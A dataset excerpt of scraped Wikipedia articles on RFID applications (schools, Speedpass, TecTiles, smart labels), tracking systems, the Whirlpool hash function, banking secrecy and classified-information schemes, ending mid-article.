text
stringlengths
16
172k
source
stringlengths
32
122
Various schools have been usingradio-frequency identificationtechnology to record and monitor students. It is thought that the first school in the US to introduceRFIDtechnology wasSpring Independent School Districtnear Houston, Texas. In 2004, it gave 28,000 students RFID badges[1]to record when students got on and off school buses. This was expanded in 2008 to include location tracking on school campuses.[2]Parents protested in January 2005 whenBrittan Elementary Schoolissued RFID to the students.[3]Administrators at a school in Sutter, California, were offered money to test RFID[4]from InCom and issued RFID-chipped ID tags to students. Students and parents felt they were not fully informed about the RFID and questioned the tactics the school used to implement the program, and the ethics of the monetary deal the school made with the company to test and promote its product. Parents quickly squashed the program with help from the American Civil Liberties Union. In 2012,Northside Independent School District, San Antonio, Texas introduced active RFID,[5]worn on a lanyard around the student's necks. One student refused to participate in the program and was expelled from school,[6]after a court case.[7]The school eventually dropped the RFID program and started tracking students with cameras instead. In 2007,Hungerhill High School, Doncaster, UK, tried RFID chips sewn into students' blazers.[8]Ten children tested the RFID for attendance.[9]There were privacy concerns,[10]and the trial was stopped. West Cheshire Collegeintegrated active ultra wideband (UWB) RFID into their new college campuses in Chester in 2010, and Ellesmere Port in 2011, to tag students and assets[11]using areal time location system(RTLS). Students wore the active RFID tags around their necks. West Cheshire College stopped RFID tagging students in February 2013. A series of Freedom of Information requests were sent to the college about the RFID tracking of students.[12]Specifications[13]of the active RFID at West Cheshire College: After a school shooting in Germany in 2009, which claimed 16 lives, the Friedrich-von-Canitz School implemented a real-time location technology over Wi-Fi. The solution was developed by the German company How To Organize (H2O) GmbH in cooperation with teachers and the local police force.[14][15] A.B.Patil School, Sangli, Maharastra implemented UHF technology to keep track of student in school premises. Passive RFIDis used routinely in schools to register teachers and students and to provide access to services such as photocopying and door access. rfid for school
https://en.wikipedia.org/wiki/RFID_in_schools
RFID Journalis an independent media company devoted solely to radio frequency identification (RFID) and its business applications. A bi-monthly print publication and online news and information source, the journal offers news, features that address key adoption issues, case studies, and white papers written by academics and industry insiders on different aspects of RFID technology. The Web site includes an FAQs section, organized by topic, bulletin boards, a blog, an RFID event calendar, a searchable vendor directory, a career center, and a store where visitors can purchase reports by RFID Journal and others. RFID Journal's digital magazine is published six times a year. It focuses on high-level strategic issues. Topics include building a business case, achieving a return on investment by working with business partners, off-setting the cost of RFID mandates with internal savings, and aligning an RFID deployment strategy with a company's overall business strategy. Launched on March 1, 2002, RFID Journal, LLC, is a privately held corporation headquartered in Melville, N.Y. RFID Journal is edited by Mark Roberti.[1][2][3][4][5]. The RFID Journal Web site provides news about RFID. The focus is on the latest deployments, mandates, standards development, and product innovation. Premium content includes features, case studies, best practices, and how-to that explain the technology's capabilities and how it is being used by companies. RFID Journal organizes international educational conferences where end users present case studies about how they are using RFID technology. RFID Journal University organizes courses on RFID andElectronic Product Codetechnologies.
https://en.wikipedia.org/wiki/RFID_Journal
RFID on metal(abbreviated to ROM) areradio-frequency identification(RFID) tags which perform a specific function when attached to metal objects. The ROM tags overcome some of the problems traditional RFID tags suffer when near metal, such as detuning and reflecting of the RFID signal, which can cause poor tag read range, phantom reads, or no read signal at all. The RFID-on-metal tags are designed to compensate for the effects of metal. There are several tag design methods to create ROM tags. The original method was to provide a spacer to shield the tagantennafrom the metal, creating bigger tags. New techniques focus on specialized antenna design that utilizes the metal interference andsignal reflectionfor longer read range than similar sized tags attached to non-metal objects.[1]RFID-on-metal transponders will continue to create new opportunities for users in a wide range of asset tracking and broader industrial applications. The main applications are asset tracking on servers and laptops in IT data centers, industrial manufacturing quality control and manufacturing, oil and gas pipeline maintenance, and gas cylinders.[2]The technology is evolving to allow transponders to be embedded in metal. The capability allows manufacturers to track small metal items from cradle to grave. The main focus for RFID inside metal is tool tracking, weapon tracking, and medical device quality control. RuBee (IEEE 1902.1) on metal RuBeeis a wireless 132 kHz packet-based protocol, with range of few feet to 50 feet, is magnetic and has near zero Radio Frequency (E)[3]energy. RuBee is often used when RF based systems have challenges in harsh environments especially on and near steel and metal. Because it is magnetic it has no multipath reflections so no nulls, and is notblocked by steel, water, snow or dirt. RuBee is in widespread use in industrial environments (over 1,500 sites) on heavy machinery (Injection Molding Machines and Tools[4]), in armories[5]and many defense[6]applications.
https://en.wikipedia.org/wiki/RFID_on_metal
AnRSA blocker tag(orRSA tag) is aRFIDtag that responds positively to all unauthorized requests, thus blocking somescannersfrom reading any RFID tags placed nearby. The tags are designed to protect privacy, and are supposedly unable to be used for theft, denials of service, and other malicious uses. Other mechanisms designed to protect privacy for RFID item tagging for retail use are theEPCglobalkill command and theClipped Tagproposed byIBM. This technology-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/RSA_blocker_tag
Asmart label, also called asmart tag, is an extremely flat configuredtransponderunder a conventional print-codedlabel, which includeschip,antennaand bonding wires as a so-called inlay.[1][2][3]The labels, made of paper, fabric or plastics, are prepared as a paper roll with the inlayslaminatedbetween the rolled carrier and the label media for use in specially-designed printer units. In many processes inlogisticsandtransportation, the barcode, or the 2D-barcode, is well established as the key means for identification in short distance. Whereas theautomationof such optical coding is limited in appropriate distance for reading success and usually requires manual operation for finding the code or scanner gates that scan all the surface of a coded object, the RFID-inlay allows for better tolerance in fully automated reading from a certain specified distance. However, the mechanical vulnerability of the RFID-inlay is higher than the ordinary label, which has its weaknesses in its resistance to scratch. Thus, the smartness of the smart label is earned in compensation of typical weaknesses with the combination of the technologies of plain text,optical character recognitionand radio code. The processing of these labels is basically as with ordinary labels in all stages of production and application, except the inlay is inserted in an automated processing step to ensure identical positioning for each label and careful processing to prevent any damage to the bonding. The printing is processed in two steps, including Customisation of smart labels is available with chip cards. Also combinations of magnetic stripes with RFID chips are used,[4]especially for credit cards. Replacing silicon processors, smart tags that are printed collect information themselves and process it. The result of decades of research and development byThinFilm Electronicsare “printed transistors, the multilayer tags combine a year’s worth of battery power, sensors and a small display, and will initially be used to show a temperature record of perishable food and medications. Roughly 3 x 1.5 inches in size and consisting of five layers sandwiched in a roll-to-roll production process, the ThinFilm labels use the company’s own ferroelectric polymer technology for storing information. Chains of non-toxic polymers can be flipped between two orientations – representing binary “0″ and “1″ – to store non-volatile data.”[5] While price increases when labels are electronic, the very small percentage of labels that are electric is increasing. Electronic labels have features that supersede non-electronic labels. Electronic versions can signal what is happening in real-time and most can store a digital record.[6] Smart labels are applied directly topackagesor topalletsor othershipping containers. The application directly to the product is still of neglectible importance The technologies with the smart labels are all mature and well standardised. After the first wave of technology hype with RFID, current consolidation in the market shows hard competitiveDarwinism. With increasing sales quantities, the inlays are still annually redesigned and appear in releases with new extensions to performance. However, the integration of RFID to handling processes requires sound engineering to ensure the balance of benefit and effort. In 2008, ThinFilm and Polyera announced their partnership to produce high volumes of smart labels. The collaboration brings printed integrated systems, such as smart sensor tags, closer to commercial availability.[7]
https://en.wikipedia.org/wiki/Smart_label
Speedpasswas akeychainradio-frequency identification(RFID) device introduced in 1997 byMobil(which merged withExxonto becomeExxonMobilin 1999) forelectronic payment. It was originally developed byVerifone. By 2004, more than seven million people possessed Speedpass tags, which could be used at approximately 10,000Exxon,MobilandEssogas stationsworldwide. Speedpass was one of the first widely deployed consumer RFID payment systems of its kind, debuting nationwide in 1997 far ahead ofVISAandMasterCardRFID trials. The ExxonMobil Speedpass was based on theTexas InstrumentsTIRIS RFID platform. It was originally designed byVerifonein two configurations; one intended for installation inside the fuel dispensing "pump", and a convenience store model known as the Verifone RF250 (which was a redesign of theIngenicoiSC250 reader forsmart cards). The ExxonMobil Speedpass used a cryptographically-enabled tag with aDigital Signature Transponder(DST) which incorporated a weak, proprietaryencryptionscheme to perform achallenge–responseprotocol. On January 29, 2005,RSA Securityand a group of students fromJohns Hopkins Universitybroke the proprietary encryption algorithm used by the Exxon-Mobil Speedpass.[1]They were able to successfully copy a Speedpass and use the copied RFID tag to purchase gas. In an attempt to prevent fraud, Speedpass users ultimately were required to enter theirzip codeinto scanners at some gas stations.[1] At one point, Speedpass was deployed experimentally infast-food restaurantsandsupermarketsin select markets.McDonald'salone deployed Speedpass in over 400 restaurants in theGreater Chicagoarea. During the 1998 development of the RF250 convenience store reader, some prototype units were shipped from Verifone inRocklin, California, to a Verifone office in Florida. The units did not arrive on time and were thought to have been lost in transit. They were later found, and despite each unit having a Verifone logo and being encased in boxes showing the Verifone logo; the shipping company had nothing in their lost goods database showing that name. Rather, the units turned up via a query for "flying red horse", apparently since the units displayed a smallMobillogo - and the Mobil logo was and is a redPegasus. The internal codename for the project was thus changed to "Flying Red Horse"[2][unreliable source?] The test was deemed a failure and McDonald's removed the scanners from all their restaurants in mid-2004. Additionally, the New England grocery chainStop & Shoptested Speedpass at their Boston area stores; the units were removed in early 2005. Speedpass has also been previously available through a Speedpass Car Tag and a Speedpass-enabledTimexwatch. ExxonMobil announced that the RFID based key tag would be fully retired by June 30, 2019. ExxonMobil directed users to use the Speedpass+appon their smartphone. The smartphone app uses the phone's location data to pay at the pump using the app. The app detects the users location which then prompts the user to input the pump number they are using. Conversely if location services are not activated for the app, the user can scan a QR code on the pump to activate pay at the pump functionality. In the United States, the app has since been renamed the Exxon Mobil Rewards+ app, although it still utilizes the Speedpass+ functionality. In Canada, it continues to use the Speedpass+ name for its app.
https://en.wikipedia.org/wiki/Speedpass
TecTilesare anear field communication(NFC) application, developed bySamsung, for use with mobilesmartphonedevices.[1] Each TecTile is a low-cost[2]self-adhesive sticker with an embeddedNFC Tag.[3]They are programmed before use, which can be done simply by the user, using a downloadableAndroid app.[3] When an NFC-capable phone is placed or 'tapped' on a Tag, the programmed action is undertaken. This could cause a website to be displayed, the phone switched to silent mode, or many other possible actions. NFC Tags are an application ofRFIDtechnology. Unlike most RFID, which makes an effort to give a long reading range, NFC deliberately limits this range to only a few inches or almost touching the phone to the Tag. This is done deliberately, so that Tags have no effect on a phone unless there is a clear user action to 'trigger' the Tag. Although phones are usually touched to Tags, this does not require any 'docking' orgalvanic contactwith the Tag, so they are still considered to be a non-contact technology. Although NFC Tags can be used with many smartphones, TecTiles gained much prominence in late 2012 with the launch of theGalaxy SIII.[4][5] Some applications are intended for customising the behaviour of a user's own phone according to a location, e.g. a quiet mode when placed on a bedside table; others are intended for public use, e.g. publicising web content about a location.[note 1]This programming is carried out entirely on the Tag. Subject to security settings,anycompatible phone would have the same response when tapped on the Tag. When the Tag's response is aFacebook 'Like'or similar, this is carried out under the phone user's credentials (such as aFacebookidentity), rather than the Tag's identity. Samsung group Tags' functions under four headings:[6]Settings, Phone, Web and Social. A handful of examples: Tags may also be pre-programmed and distributed to users. Such a Tag could be set to take the user to a manufacturer's service support page and sent out stuck to washing machines or other domestic whitegoods. Factory-prepared Tags can also be printed with logos, or moulded into forms apart from stickers, such as key fobs or wristbands. The re-programmability of a Tag is claimed at over 100,000 programming cycles.[5] A Tag placed on a doorway or noticeboard may be re-programmed in situ and could thus have a long life (e.g. many conferences, meetings or events). Tags may be locked after programming,[3]to avoid unauthorized reprogramming. Locked tags may be unlocked only by the same phone that locked them. The duration of a locked Tag's relevance will be the main constraint on Tag lifetime if unlocking is not possible. The lifespan of a Tag is also likely to be limited by physical factors such as the glue adhesion, or the difficulty of peeling them from the glue. The TecTile app is not installed by default.[6]If a Tag is read before it is installed, the user is directed to the app download site. Using a Samsung TecTile NFC tag requires a device with theMIFAREClassic chipset.[7]This chipset is based on NXP's NFC controller, which is outside the NFC Forum's standard. Using a TecTile thus requires the NXP chipset. The NXP chipset is found in manyAndroidphones. Recently Android phone manufacturers have chosen to drop TecTile support; notably in Samsung's latest flagship phone theGalaxy S4[8]and Google'sNexus 4.[9]TecTiles also donotwork withBlackBerryandWindowsNFC phones. The new version of TecTile, calledTecTile 2, have improved compatibility,[10]but currently the Samsung Galaxy S4 is the only device that comes with native support for TecTile 2.[11] NFC Tags thatdocomply with NFC Forum Type 1 or Type 2 compatibility protocols[12]are much more widely compatible than theMIFAREdependant Samsung TecTile,[13]and are also widely available. Popular standards compliant NFC Tags are theNTAG213(137 bytes of usable memory), and theTopaz 512(480 bytes of usable memory).[14] The need for the installed app is one of the drawbacks to TecTile and to NFC Tags in general. The basic NFC Tag standards support Tags carryingURLs, where theschemeor protocol (e.g. thehttp://prefix) may be eitherhttp(for web addresses),telfor telephony, or an anonymousdatascheme. Although support for thehttpandtelschemes may be assumed in a basic handset, support for the others will not be available unless an App has been installed and registered to handle them. In general, NFC Tags (in the non-TecTile sense) are only useful for web addresses and telephony. To provide features beyond this, Samsung offers the TecTile App. Thiscouldhave used any scheme on a tag, or even invented a whole new scheme. When installed, such an App would register itself to handle these new schemes. However the App is not part of the default install for a handset, even a Samsung. To allow users to install the App automatically, on first encountering a TecTile, all the TecTile's sophisticated and phone-specific features are still provided through thehttpscheme. The basic URL is that for initially downloading the App, details of the TecTile operation are encoded as URL parameters within thequery stringin addition to this. When reading a Tag, one of two things happens: This convoluted behaviour was chosen to make the App effectively self-installing for naive users. Why the App was not supplied as default is unknown. The downsides of this design choice though are that the URLs required to activate TecTile functions are relatively long, meaning that non-TecTile NFC Tags with limited memory size (137 bytes) cannot generally be used for functions other than web addresses. Additionally, the lack of a non-proprietary approach to these more capable functions limits the development of NFC Tags as a general technique across all such handsets, rather than just Samsung TecTiles.
https://en.wikipedia.org/wiki/TecTile
Atracking systemorlocating systemis used fortrackingpersons or objects that do not stay in a fixed location, and supplying a time-ordered sequence of positions (track). A myriad of tracking systems exist. Some are 'lag time' indicators, that is, the data is collected after an item has passed a point for example, abar codeor choke point or gate.[1]Others are 'real-time' or 'near real-time' likeGlobal Positioning Systems(GPS) depending on how often the data is refreshed. There are bar-code systems which require items to be scanned and other which haveautomatic identification(RFIDauto-id). For the most part, the tracking worlds are composed of discrete hardware and software systems for different applications. That is, bar-code systems are separate fromElectronic Product Code(EPC) systems and GPS systems are separate from active real time locating systems orRTLS. For example, a passive RFID system would be used in a warehouse to scan the boxes as they are loaded on a truck - then the truck itself is tracked on a different system using GPS with its own features and software.[2]The major technology “silos” in the supply chain are: Indoors assets aretrackedrepetitively reading e.g. a barcode,[3]any passive and activeRFID, then, feeding read data into Work in Progress models (WIP) or Warehouse Management Systems (WMS) or ERP software. The readers required per choke point are meshed auto-ID or hand-held ID applications. However, tracking could also be capable of providing data monitoring without being bound to a fixed location by using a cooperative tracking capability such as anRTLS. Outdoors mobile assets of high value are tracked by choke point,[4]802.11,Received Signal Strength Indication(RSSI), Time Delay on Arrival (TDOA), active RFID or GPS Yard Management; feeding into either third party yard management software from the provider or to an existing system. Yard Management Systems (YMS) couple location data collected by RFID and GPS systems to help supply chain managers to optimize utilization of yard assets such as trailers and dock doors. YMS systems can use either active or passive RFID tags. Fleet managementis applied as atracking application using GPSand composing tracks from subsequent vehicle's positions. Each vehicle to be tracked is equipped with a GPS receiver and relays the obtained coordinates viacellularorsatellite networksto a home station.[5]Fleet management is required by: Person tracking relies onunique identifiersthat are temporarily (RFIDtags) or permanently assigned to persons likepersonal identifiers(includingbiometricidentifiers), ornational identification numbersand a way to sample their positions, either on short temporal scales as through GPS or forpublic administrationto keep track of a state'scitizensortemporary residents. The purposes for doing so are numerous, for example fromwelfareandpublic securitytomass surveillance. Mobile phone services Location-based services(LBS) utilise a combination ofA-GPS, newer GPS and cellular locating technology that is derived from thetelematicsand telecom world.Line of sightis not necessarily required for a location fix. This is a significant advantage in certain applications since a GPS signal can still be lost indoors. As such, A-GPS enabled cell phones andPDAscan be located indoors and the handset may be tracked more precisely. This enables non-vehicle centric applications and can bridge theindoor locationgap, typically the domain ofRFIDandReal-time locating system(RTLS) systems, with an off the shelf cellular device. Currently[when?], A-GPS enabled handsets are still highly dependent on the LBS carrier system, so handset device choice and application requirements are still not apparent. Enterprise system integrators need the skills and knowledge to correctly choose the pieces that will fit the application and geography. Regardless of the tracking technology, for the most part, the end-users just want to locate themselves or wish to find points of interest. The reality is that there is no "one size fits all" solution with locating technology for all conditions and applications. Application of tracking is a substantial basis forvehicle trackingin fleet management,asset management, individual navigation, social networking, or mobile resource management and more. Company, group or individual interests can benefit from more than one of the offered technologies depending on the context. GPShas global coverage but can be hindered by line-of-sight issues caused by buildings and urban canyons;Map matchingtechniques, which involve several algorithms, can help improve accuracy in such conditions.[6]RFID is excellent and reliable indoors or in situations where close proximity to tag readers is feasible, but has limited range and still requires costly readers. RFID stands forRadio Frequency Identification. This technology uses electromagnetic waves to receive the signal from the targeting object to then save the location on a reader that can be looked at through specialized software.[7][8] RTLSare enabled byWireless LANsystems (according toIEEE 802.11) or otherwirelesssystems (according toIEEE 802.15) withmultilateration. Such equipment is suitable for certain confined areas, such as campuses and office buildings. RTLS requires system-level deployments and server functions to be effective. Invirtual spacetechnology, a tracking system is generally a system capable of rendering virtual space to a human observer while tracking the observer'scoordinates. For instance, in dynamicvirtual auditory spacesimulations, a head tracker provides information to a central processor in real time and this enables the processor to select what functions are necessary to give feedback to the user in relation to where they are positioned.[1] Additionally, there isvision-based trajectory tracking, that uses a color and depth camera known as aKINECTsensor to track 3D position and movement. This technology can be used in traffic control, human-computer interface, video compression and robotics.[9]
https://en.wikipedia.org/wiki/Tracking_system
Incomputer scienceandcryptography,Whirlpool(sometimes styledWHIRLPOOL) is acryptographic hash function. It was designed byVincent Rijmen(co-creator of theAdvanced Encryption Standard) andPaulo S. L. M. Barreto, who first described it in 2000. The hash has been recommended by theNESSIEproject. It has also been adopted by theInternational Organization for Standardization(ISO) and theInternational Electrotechnical Commission(IEC) as part of the joint ISO/IEC 10118-3international standard. Whirlpool is a hash designed after theSquareblock cipher, and is considered to be in that family of block cipher functions. Whirlpool is aMiyaguchi-Preneelconstruction based on a substantially modifiedAdvanced Encryption Standard(AES). Whirlpool takes a message of any length less than 2256bits and returns a 512-bitmessage digest.[3] The authors have declared that The original Whirlpool will be calledWhirlpool-0, the first revision of Whirlpool will be calledWhirlpool-Tand the latest version will be calledWhirlpoolin the following test vectors. The Whirlpool hash function is aMerkle–Damgård constructionbased on anAES-likeblock cipherW inMiyaguchi–Preneelmode.[2] Theblock cipherW consists of an 8×8 state matrixS{\displaystyle S}of bytes, for a total of 512 bits. The encryption process consists of updating the state with four round functions over 10 rounds. The four round functions are SubBytes (SB), ShiftColumns (SC), MixRows (MR) and AddRoundKey (AK). During each round the new state is computed asS=AK∘MR∘SC∘SB(S){\displaystyle S=AK\circ MR\circ SC\circ SB(S)}. TheSubBytesoperation applies a non-linear permutation (the S-box) to each byte of the state independently. The 8-bit S-box is composed of 3 smaller 4-bit S-boxes. TheShiftColumnsoperation cyclically shifts each byte in each column of the state. Columnjhas its bytes shifted downwards byjpositions. TheMixRowsoperation is a right-multiplication of each row by an 8×8 matrix overGF(28){\displaystyle GF({2^{8}})}. The matrix is chosen such that thebranch number(an important property when looking at resistance todifferential cryptanalysis) is 9, which is maximal. TheAddRoundKeyoperation uses bitwisexorto add a key calculated by the key schedule to the current state. The key schedule is identical to the encryption itself, except the AddRoundKey function is replaced by anAddRoundConstantfunction that adds a predetermined constant in each round. The Whirlpool algorithm has undergone two revisions since its original 2000 specification. People incorporating Whirlpool will most likely use the most recent revision of Whirlpool; while there are no known security weaknesses in earlier versions of Whirlpool, the most recent revision has better hardware implementation efficiency characteristics, and is also likely to be more secure. As mentioned earlier, it is also the version adopted in the ISO/IEC 10118-3international standard. The 512-bit (64-byte) Whirlpool hashes (also termedmessage digests) are typically represented as 128-digithexadecimalnumbers.The following demonstrates a 43-byteASCIIinput (not including quotes) and the corresponding Whirlpool hashes: The authors providereference implementationsof the Whirlpool algorithm, including a version written inCand a version written inJava.[2]These reference implementations have been released into the public domain.[2] Research on the security analysis of the Whirlpool function however, has revealed that on average, the introduction of 8 random faults is sufficient to compromise the 512-bit Whirlpool hash message being processed and the secret key of HMAC-Whirlpool within the context of Cloud of Things (CoTs). This emphasizes the need for increased security measures in its implementation.[5] Two of the first widely used mainstream cryptographic programs that started using Whirlpool wereFreeOTFE, followed byTrueCryptin 2005.[citation needed] VeraCrypt(a fork ofTrueCrypt) included Whirlpool (the final version) as one of its supported hash algorithms.[6]
https://en.wikipedia.org/wiki/Whirlpool_(hash_function)
This is alist offree and open-source software(FOSS)packages,computer softwarelicensed underfree software licensesandopen-source licenses. Software that fitsthe Free Software Definitionmay be more appropriately calledfree software; theGNU projectin particular objects to their works being referred to asopen-source.[1]For more information about the philosophical background for open-source software, seefree software movementandOpen Source Initiative. However, nearly all software meeting the Free Software Definition also meetsthe Open Source Definitionand vice versa. A small fraction of the software that meets either definition is listed here. Some of the open-source applications are also the basis ofcommercial products, shown in theList of commercial open-source applications and services. Be advised that available distributions of these systems can contain, or offer to build and install, added software that is neither free software nor open-source.
https://en.wikipedia.org/wiki/List_of_free_and_open-source_software_packages
Banking secrecy,[1][2]alternatively known asfinancial privacy,banking discretion, orbank safety,[3][4]is aconditional agreementbetween a bank and its clients that all foregoing activities remain secure,confidential, and private.[5]Most often associated withbanking in Switzerland, banking secrecy is prevalent inLuxembourg,Monaco,Hong Kong,Singapore,Ireland, andLebanon, among otheroff-shore banking institutions. Otherwise known asbank–client confidentialityorbanker–client privilege,[6][7]the practice was started byItalian merchantsduring the 1600s nearNorthern Italy(a region that would become theItalian-speaking regionof Switzerland).[8]Geneva bankers established secrecysocially and through civil law in theFrench-speaking regionduring the 1700s.Swissbanking secrecy was first codified with theBanking Act of 1934, thus making it a crime to disclose client information to third parties without a client's consent. The law, coupled with a stable Swiss currency and international neutrality, prompted large capital flight to private Swiss accounts. During the 1940s,numbered bank accountswere introduced creating an enduring principle of bank secrecy that continues to be considered one of the main aspects ofprivate bankingglobally. Advances infinancial cryptography(viapublic-key cryptography) could make it possible to use anonymous electronic money and anonymous digital bearer certificates for financial privacy and anonymous Internet banking, given enabling institutions and secure computer systems.[9] While some banking institutions voluntarily impose banking secrecy institutionally, others operate in regions where the practice is legally mandated and protected (e.g.off-shore financial centers). Almost all banking secrecy standards prohibit the disclosure of client information to third parties without consent or an acceptedcriminal complaint. Additional privacy is provided to select clients vianumbered bank accountsor underground bank vaults. Recent research has indicated that the use of offshore financial centers has been of concern because criminals get involved with them. It is argued that these financial centers enable the actions of criminals. However, there have been attempts by global institutions to regulate money laundering and illegal activities.[10] Numbered bank accounts, used by Swiss banks and other offshore banks located in tax havens, have been accused by the international community of being a major instrument of the underground economy, facilitating tax evasion and money laundering.[11]AfterAl Capone's 1931 condemnation for tax evasion, according to journalistLucy Komisar: mobsterMeyer Lanskytook money fromNew Orleansslot machines and shifted it to accounts overseas. The Swiss secrecy law two years later assured him ofG-man-proof-banking.[11]Later, he bought a Swiss bank and for years deposited his Havana casino take in Miami accounts, then wired the funds to Switzerland via a network of shell andholdingcompanies and offshore accounts.[11] Economist andNobel PrizelaureateJoseph Stiglitz, told Komisar: You ask why, if there's an important role for a regulated banking system, do you allow a non-regulated banking system to continue? It's in the interest of some of the moneyed interests to allow this to occur. It's not an accident; it could have been shut down at any time. If you said the US, the UK, the majorG7banks will not deal with offshore bank centers that don't comply with G7 banks regulations, these banks could not exist. They only exist because they engage in transactions with standard banks.[11] Further research inpoliticsis needed to gain a better understanding of banking secrecy.[12]For instance, the role of economic interests, competition between financial centers, and the influence of political power on international organizations like theOECDare great places to start.
https://en.wikipedia.org/wiki/Bank_secrecy
Classified informationis confidential material that a government deems to besensitive informationwhich must be protected from unauthorized disclosure that requires special handling and dissemination controls. Access is restricted bylawor regulation to particular groups of individuals with the necessarysecurity clearancewith aneed to know. A formalsecurity clearanceis required to view or handle classified material. The clearance process requires a satisfactory background investigation. Documents and other information must be properly marked "by the author" with one of several (hierarchical) levels of sensitivity—e.g. Confidential (C), Secret (S), and Top Secret (S). All classified documents require designation markings on the technical file which is usually located either on the cover sheet, header and footer of page. The choice of level is based on an impact assessment; governments have their own criteria, including how to determine the classification of an information asset and rules on how to protect information classified at each level. This process often includes security clearances for personnel handling the information. Mishandling of the material can incur criminal penalties. Somecorporationsand non-government organizations also assign levels of protection to their private information, either from a desire to protecttrade secrets, or because of laws and regulations governing various matters such aspersonal privacy, sealed legal proceedings and the timing of financial information releases. With the passage of time much classified information can become less sensitive, and may be declassified and made public. Since the late twentieth century there has beenfreedom of information legislationin some countries, whereby the public is deemed to have the right to all information that is not considered to be damaging if released. Sometimes documents are released with information still considered confidential obscured (redacted), as in the adjacent example. The question exists among some political science and legal experts whether the definition of classified ought to be information that would cause injury to the cause of justice, human rights, etc., rather than information that would cause injury to the national interest; to distinguish when classifying information is in the collective best interest of a just society, or merely the best interest of a society acting unjustly to protect its people, government, or administrative officials from legitimate recourses consistent with a fair and justsocial contract. The purpose of classification is to protect information. Higher classifications protect information that might endangernational security. Classification formalises what constitutes a "state secret" and accords different levels of protection based on the expected damage the information might cause in the wrong hands. However, classified information is frequently "leaked" to reporters by officials for political purposes. Several U.S. presidents have leaked sensitive information to influence public opinion.[2][3] Former government intelligence officials are usually able to retain their security clearance, but it is a privilege not a right, with the President being the grantor.[4] Although the classification systems vary from country to country, most have levels corresponding to the following British definitions (from the highest level to lowest). Top Secretis the highest level of classified information.[5]Information is further compartmented so that specific access using a code word aftertop secretis a legal way to hide collective and important information.[6]Such material would cause "exceptionally grave damage" tonational securityif made publicly available.[7]Prior to 1942, the United Kingdom and other members of the British Empire usedMost Secret, but this was later changed to match the United States' category name ofTop Secretin order to simplify Allied interoperability. The unauthorized disclosure of Top Secret (TS) information is expected to cause harm and be of grave threat to national security. The Washington Postreported in an investigation entitled "Top Secret America" that, as of 2010, "An estimated 854,000 people ... hold top-secret security clearances" in the United States.[8] It is desired that no document be released which refers toexperiments with humansand might have adverse effect on public opinion or result in legal suits. Documents covering such work field should be classified "secret". Secretmaterial would cause "serious damage" to national security if it were publicly available.[11] In the United States, operational "Secret" information can be marked with an additional "LimDis", to limit distribution. Confidentialmaterial would cause "damage" or be prejudicial to national security if publicly available.[12] Restrictedmaterial would cause "undesirable effects" if publicly available. Some countries do not have such a classification in public sectors, such as commercial industries. Such a level is also known as "PrivateInformation". Official(equivalent to U.S. DOD classificationControlled Unclassified Informationor CUI) material forms the generality of government business, public service delivery and commercial activity. This includes a diverse range of information, of varying sensitivities, and with differing consequences resulting from compromise or loss. Official information must be secured against athreat modelthat is broadly similar to that faced by a large private company. The Official Sensitive classification replaced the Restricted classification in April 2014 in the UK; Official indicates the previously used Unclassified marking.[13] Unclassifiedis technically not a classification level. Though this is a feature of some classification schemes, used for government documents that do not merit a particular classification or which have been declassified. This is because the information is low-impact, and therefore does not require any special protection, such as vetting of personnel. A plethora of pseudo-classifications exist under this category.[citation needed] Clearanceis a general classification, that comprises a variety of rules controlling the level of permission required to view some classified information, and how it must be stored, transmitted, and destroyed. Additionally, access is restricted on a "need to know" basis. Simply possessing a clearance does not automatically authorize the individual to view all material classified at that level or below that level. The individual must present a legitimate "need to know" in addition to the proper level of clearance. In addition to the general risk-based classification levels, additionalcompartmented constraints on accessexist, such as (in the U.S.) Special Intelligence (SI), which protects intelligence sources and methods, No Foreign dissemination (NoForn), which restricts dissemination to U.S. nationals, and Originator Controlled dissemination (OrCon), which ensures that the originator can track possessors of the information. Information in these compartments is usually marked with specific keywords in addition to the classification level. Government information aboutnuclear weaponsoften has an additional marking to show it contains such information (CNWDI). When a government agency or group shares information between an agency or group of other country's government they will generally employ a special classification scheme that both parties have previously agreed to honour. For example, the marking Atomal, is applied to U.S. Restricted Data or Formerly Restricted Data and United Kingdom Atomic information that has been released to NATO. Atomal information is marked COSMIC Top Secret Atomal (CTSA), NATO Secret Atomal (NSAT), or NATO Confidential Atomal (NCA). BALK and BOHEMIA are also used. For example, sensitive information shared amongstNATOallies has four levels of security classification; from most to least classified:[14][15] A special case exists with regard to NATO Unclassified (NU) information. Documents with this marking are NATO property (copyright) and must not be made public without NATO permission. COSMIC is an acronym for "Control of Secret Material in an International Command".[17] Most countries employ some sort of classification system for certain government information. For example, inCanada, information that the U.S. would classify SBU (Sensitive but Unclassified) is called "protected" and further subcategorised into levels A, B, and C. On 19 July 2011, the National Security (NS) classification marking scheme and the Non-National Security (NNS) classification marking scheme inAustraliawas unified into one structure. As of 2018, the policy detailing howAustralian governmententities handle classified information is defined in the Protective Security Policy Framework (PSPF). The PSPF is published by theAttorney-General's Departmentand covers security governance,information security, personal security, andphysical security. A security classification can be applied to the information itself or an asset that holds information e.g., aUSBorlaptop.[23] The Australian Government uses four security classifications: OFFICIAL: Sensitive, PROTECTED, SECRET and TOP SECRET. The relevant security classification is based on the likely damage resulting from compromise of the information's confidentiality. All other information from business operations and services requires a routine level of protection and is treated as OFFICIAL. Information that does not form part of official duty is treated as UNOFFICIAL. OFFICIAL and UNOFFICIAL are not security classifications and are not mandatory markings. Caveats are a warning that the information has special protections in addition to those indicated by the security classification of PROTECTED or higher (or in the case of the NATIONAL CABINET caveat, OFFICIAL: Sensitive or higher). Australia has four caveats: Codewords are primarily used within the national security community. Each codeword identifies a special need-to-knowcompartment. Foreign government markings are applied to information created by Australian agencies from foreign source information. Foreign government marking caveats require protection at least equivalent to that required by the foreign government providing the source information. Special handling instructions are used to indicate particular precautions for information handling. They include: A releasability caveat restricts information based oncitizenship. The three in use are: Additionally, the PSPF outlines Information Management Markers (IMM) as a way for entities to identify information that is subject to non-security related restrictions on access and use. These are: There are three levels ofdocument classificationunder Brazilian Law No. 12.527, theAccess to Information Act:[24]ultrassecreto(top secret),secreto(secret) andreservado(restricted). A top secret (ultrassecreto) government-issued document may be classified for a period of 25 years, which may be extended up to another 25 years.[25]Thus, no document remains classified for more than 50 years. This is mandated by the 2011 Information Access Law (Lei de Acesso à Informação), a change from the previous rule, under which documents could have their classification time length renewed indefinitely, effectively shuttering state secrets from the public. The 2011 law applies retroactively to existing documents. The government of Canada employs two main types of sensitive information designation: Classified and Protected. The access and protection of both types of information is governed by theSecurity of Information Act, effective 24 December 2001, replacing theOfficial Secrets Act 